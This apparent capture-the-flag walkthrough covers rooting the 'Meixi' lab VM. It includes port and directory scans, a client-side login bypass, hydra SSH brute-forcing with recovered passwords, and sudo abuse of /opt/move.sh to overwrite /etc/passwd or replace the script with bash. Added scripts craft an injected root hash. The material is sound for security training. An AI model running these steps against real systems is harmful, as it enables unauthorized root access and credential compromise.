Meixi Target Machine Walkthrough

1. Information Gathering

1.1 Port scan:
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- 192.168.209.122
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 23:03 EDT
Nmap scan report for 192.168.209.122
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Neon User Matrix
MAC Address: 08:00:27:D8:B9:BA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.209.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds

1.2 Directory scan:
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://192.168.209.122/ -x php,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.209.122/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.hta.txt (Status: 403) [Size: 280]
/.hta.zip (Status: 403) [Size: 280]
/.hta.php (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/.htpasswd.php (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.htaccess.php (Status: 403) [Size: 280]
/.htaccess.txt (Status: 403) [Size: 280]
/.htaccess.zip (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/.htpasswd.txt (Status: 403) [Size: 280]
/.htpasswd.zip (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 4585]
/login.php (Status: 200) [Size: 1556]
/pass (Status: 200) [Size: 39]
/server-status (Status: 403) [Size: 280]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
==============================================================

/pass (the 39-byte file above) contains an awk expression; it is used later during privilege escalation.

2. Getting a shell

Browsing to port 80 ("Neon User Matrix") gives away usernames.

Open login.php and try the username admin first; the password is not checked at all (a few attempts make that obvious).

Clicking the login button does nothing because the restriction exists only in the front end: remove the disabled attribute from the button in the browser's developer tools (or send the POST request directly, since the server never sees that attribute) and the restriction is gone.

A shell is obtained as www-data.
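The point of the disabled-button step is that a client-side attribute is not a control. As an added example (not the write-up's own code; the real login.php markup and its field names are not reproduced on the page, so the HTML below is constructed, and the URL is a placeholder), this shell script lists a form's inputs, flags the ones a browser will refuse to click or submit because of disabled, and prints the direct curl POST that ignores the attribute entirely.

```shell
#!/bin/bash
# Added example, not from the original write-up. The login form HTML below is
# constructed for the demo; the real login.php and its field names are not
# reproduced on the page.

# Print "name type state" for every <input>/<button> in the HTML read on stdin.
# "disabled" is a browser-side attribute: the browser will not click or submit
# such a control, but the server never sees the attribute, so it is not a
# security control and cannot replace a server-side password check.
list_form_inputs() {
    tr '\n' ' ' |
    awk 'BEGIN { RS = "<" } NR > 1 && tolower($1) ~ /^(input|button)/ { print "<" $0 }' |
    while IFS= read -r tag; do
        name=$(printf '%s' "$tag" | sed -nE 's/.*name="([^"]*)".*/\1/p')
        type=$(printf '%s' "$tag" | sed -nE 's/.*type="([^"]*)".*/\1/p')
        state=enabled
        printf '%s' "$tag" | grep -qiE '[[:space:]]disabled([[:space:]>=/]|$)' && state=disabled
        printf '%s %s %s\n' "${name:--}" "${type:-text}" "$state"
    done
}

# Build the curl(1) command that submits the same fields directly, whatever
# the page's buttons say. VALUE placeholders are for the caller to fill in.
direct_post_cmd() {
    local url="$1" html="$2" cmd name _type _state
    cmd="curl -s -i -X POST '$url'"
    while read -r name _type _state; do
        [ "$name" = "-" ] && continue
        cmd="$cmd -d '$name=VALUE'"
    done <<EOF
$(printf '%s' "$html" | list_form_inputs)
EOF
    printf '%s\n' "$cmd"
}

# Constructed sample: a login form whose submit button is disabled client-side.
SAMPLE_HTML='<form action="login.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <button type="submit" disabled>Login</button>
</form>'

printf '%s' "$SAMPLE_HTML" | list_form_inputs
direct_post_cmd 'http://192.168.209.122/login.php' "$SAMPLE_HTML"
```

Deleting disabled in the developer tools and sending the POST with curl are the same bypass: the server sees an ordinary form submission either way. The only check that would matter is whether login.php validates the password on the server side, which on this box it does not.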

3. Privilege escalation:

Use the awk expression from pass on 5000.txt to extract the passwords:

www-data@Meixi:/var/www/html$ awk -f pass 5000.txt
awk -f pass 5000.txt
cassandra
fuckit
pinkgirl
summertime
www-data@Meixi:/var/www/html$ ls /home
hyh laoye qiaojojo sublarge

Brute-force SSH with hydra (the file user holds the four names from /home, the file aa the four passwords from the awk output):

┌──(root㉿kali)-[/tmp]
└─# hydra -L user -P aa -t 4 -I ssh://192.168.209.122
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-27 22:24:53
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 16 login tries (l:4/p:4), ~4 tries per task
[DATA] attacking ssh://192.168.209.122:22/
[22][ssh] host: 192.168.209.122 login: hyh password: cassandra
[22][ssh] host: 192.168.209.122 login: laoye password: fuckit
[22][ssh] host: 192.168.209.122 login: qiaojojo password: pinkgirl
[22][ssh] host: 192.168.209.122 login: sublarge password: summertime
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-27 22:25:02

Log in over SSH with each account; only qiaojojo has a sudo rule that can be abused. /opt/move.sh moves a file from a source path to a destination path. It validates only the argument count and that the source is a regular file; both paths are caller-chosen and mv runs as root, so the rule amounts to an arbitrary file move (and overwrite) as root.

qiaojojo@Meixi:~$ sudo -l
Matching Defaults entries for qiaojojo on Meixi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiaojojo may run the following commands on Meixi:
(ALL) NOPASSWD: /opt/move.sh

qiaojojo@Meixi:/opt$ cat move.sh
#!/bin/bash
if [ $# -ne 2 ]; then
    echo "Error: Incorrect number of arguments" >&2
    exit 1
fi
src_file=$1
dest_path=$2
if [ ! -f "$src_file" ]; then
    echo "Error: Source file does not exist" >&2
    exit 2
fi
mv "$src_file" "$dest_path"
if [ $? -eq 0 ]; then
    echo "File moved successfully: $src_file -> $dest_path"
else
    echo "Unknown error: Failed to move file" >&2
    exit 4
fi

Approach:

1. Move a crafted copy of /etc/passwd into place whose root entry carries a password hash we know. The password field of /etc/passwd is honoured when it is not x, so su root then accepts the chosen password.

2. Move a copy of bash over /opt/move.sh. The sudo rule matches the path, not the content, so sudo /opt/move.sh then runs bash as root (no -p flag is needed: this is not a SUID binary, sudo itself grants uid 0).

Method one (the crafted /tmp/passwd, a copy of /etc/passwd with root's x replaced by a known hash, was prepared beforehand; the transcript starts after that step):

qiaojojo@Meixi:/opt$ sudo -u root /opt/move.sh /tmp/passwd /etc
File moved successfully: /tmp/passwd -> /etc
qiaojojo@Meixi:/opt$ cat etc/passwd
cat: etc/passwd: No such file or directory
qiaojojo@Meixi:/opt$ cd
qiaojojo@Meixi:~$ cat /etc/passwd | head -3
root:$1$IPae7kgk$c2xLyPT6YfuxVtcOfovtC/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

qiaojojo@Meixi:~$ su - root
Password:
root@Meixi:~# ls
root.txt
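Added example for method one (my code, not the write-up's): it prepares the /tmp/passwd that the transcript above has already moved into place, and checks it before the move. The sudo rule, /opt/move.sh and the MD5-crypt ($1$) hash format are from the page; the sample passwd content, the placeholder hash and the password in the usage comments are assumptions of this example.

```shell
#!/bin/bash
# Added example, not from the original write-up: prepare and sanity-check the
# crafted passwd file that method one moves over /etc/passwd via the root-run
# /opt/move.sh. The sample passwd content and the placeholder hash below are
# constructed for the offline demo; on the target the hash would come from
# openssl passwd -1 (MD5-crypt, the "$1$" format seen in the transcript).
set -eu

# Rewrite the password field (field 2) of the root entry only; every other
# line passes through untouched. Reads stdin, writes stdout.
inject_root_hash() {
    local hash="$1"
    awk -F: -v h="$hash" 'BEGIN { OFS = ":" } $1 == "root" { $2 = h } { print }'
}

# A broken /etc/passwd locks out every account, including the attacker's, and
# the move cannot be undone without root. Refuse unless the crafted copy has
# the same number of lines as the original and root's field 2 is our hash.
verify_crafted_passwd() {
    local orig="$1" crafted="$2" hash="$3"
    [ "$(wc -l < "$orig" | tr -d ' ')" -eq "$(wc -l < "$crafted" | tr -d ' ')" ] || return 1
    awk -F: -v h="$hash" '$1 == "root" && $2 == h { ok = 1 } END { exit !ok }' "$crafted"
}

# Constructed sample standing in for the target's /etc/passwd.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin'

# Placeholder in MD5-crypt layout ($1$salt$digest); not a real digest.
DEMO_HASH='$1$saltsalt$placeholderhashvalue0000'

work=$(mktemp -d)
printf '%s\n' "$SAMPLE_PASSWD" > "$work/passwd"
inject_root_hash "$DEMO_HASH" < "$work/passwd" > "$work/passwd.new"
verify_crafted_passwd "$work/passwd" "$work/passwd.new" "$DEMO_HASH" && echo "crafted file OK"
head -1 "$work/passwd.new"

# On the target, with the sudo rule from the write-up (password is our choice):
#   HASH=$(openssl passwd -1 'ChosenPassw0rd')
#   inject_root_hash "$HASH" < /etc/passwd > /tmp/passwd
#   chmod 644 /tmp/passwd
#   verify_crafted_passwd /etc/passwd /tmp/passwd "$HASH"
#   sudo /opt/move.sh /tmp/passwd /etc/passwd
#   su - root        # enter ChosenPassw0rd
```

Two details worth knowing before the move: mv keeps the source file's owner and mode, so the new /etc/passwd ends up owned by qiaojojo (a visible trace, and the reason for the chmod 644 above, since a non-world-readable passwd breaks every unprivileged lookup on the box); and the original /etc/passwd is gone once the move succeeds, so the line-count check is the last chance to catch a truncated copy. Method two has the same ownership property for /opt/move.sh.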

Method two:

qiaojojo@Meixi:~$ cp /bin/bash ./ 
qiaojojo@Meixi:~$ ls
bash user.txt
qiaojojo@Meixi:~$ cd /opt/
qiaojojo@Meixi:/opt$ ;s
-bash: syntax error near unexpected token `;'
qiaojojo@Meixi:/opt$ ls
move.sh
qiaojojo@Meixi:/opt$ cd
qiaojojo@Meixi:~$ ls
bash user.txt
qiaojojo@Meixi:~$ cp /bin/bash ./
qiaojojo@Meixi:~$ ls
bash user.txt
qiaojojo@Meixi:~$ sudo -u root /opt/move.sh bash /opt/move.sh
File moved successfully: bash -> /opt/move.sh
qiaojojo@Meixi:~$ ls
user.txt
qiaojojo@Meixi:~$ sudo -u root /opt/move.sh
root@Meixi:/home/qiaojojo# id
uid=0(root) gid=0(root) groups=0(root)
root@Meixi:/home/qiaojojo#

http://example.com/2025/05/28/Meixi靶机复盘/
Author
XCDH
Published
28 May 2025